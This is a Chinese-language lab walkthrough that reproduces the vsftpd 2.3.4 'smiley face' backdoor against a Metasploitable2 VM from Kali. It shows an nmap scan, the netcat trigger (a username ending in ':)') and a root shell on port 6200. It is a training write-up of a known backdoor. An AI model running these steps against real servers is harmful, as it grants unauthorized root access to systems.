笑脸漏洞 : )复现
system:kali
ipaddr:192.168.10.222
netmask:255.255.255.0
gateway:192.168.10.254system:metasploitable2
ipaddr:192.168.10.20
netmask:255.255.255.0
gateway:192.168.10.254
metasploitable2
用户名和密码:msfadmin
登陆root并更改密码
sudo su
#输入当前用户的密码:msfadmin
passwd root
#输入要修改的密码:toor修改网卡配置文件
vim /etc/network/interfaces
---------------------------------
auto eth0
iface eth0 inet static
address 192.168.10.20
netmask 255.255.255.0
gateway 192.168.10.254
---------------------------------重启网卡并查看
/etc/init.d/networking restart
ip addkali
用户名和密码:kali
使用nmap工具扫描192.168.10.20主机
nmap 192.168.10.20
---------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-08 21:12 EST
Nmap scan report for 192.168.10.20 #192.168.10.20的扫描报告
Host is up (0.0019s latency). #主机已开启
Not shown: 977 closed tcp ports (reset) #未显示:977 个关闭的 TCP 端口(重置)
PORT STATE SERVICE #端口 状态 服务
21/tcp open ftp #这个是我们需要攻击的vsftp 2.3.4服务
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:02:5C:4B (VMware) #MAC地址:00:0C:29:02:5C:4B(VMware)
Nmap scan report for 192.168.10.222 #这些是kali自己的,都已忽略
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.10.222 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.79 seconds
--------------------再打开一个终端,使用nc(瑞士军刀)连接21端口
nc 192.168.10.20 21
-------------------
220 (vsFTPd 2.3.4) #连接至服务器
user a:) #提供用户名(输入)
331 Please specify the password. #表示它已经接受了用户名,并要求指定密码
pass 123456 #提供密码(输入)
-------------------切回刚刚扫描的终端,使用nmap工具扫描192.168.10.20主机的6200端口
nmap -p 6200 192.168.10.20
-------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-08 21:21 EST
Nmap scan report for 192.168.10.20 #192.168.10.20的扫描报告
Host is up (0.00026s latency). #主机已开启
PORT STATE SERVICE #端口 状态 服务
6200/tcp open lm-x #这个是我们刚刚nc瑞士小军刀划开的端口
MAC Address: 00:0C:29:02:5C:4B (VMware) #MAC地址:00:0C:29:02:5C:4B(VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.35 seconds
-------------------#使用nc(瑞士军刀)连接6200端口
nc 192.168.10.20 6200
-------------------
whoami #询问当前用户是谁(输入)
root #反馈的当前用户
-------------------如果连不上,看看之前 nc 192.168.10.20 21 这个命令的终端
如果最后一行出现 421 Timeout. 表示连接已超时
重新打一遍 nc 192.168.10.20 21
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 Vincent Cassano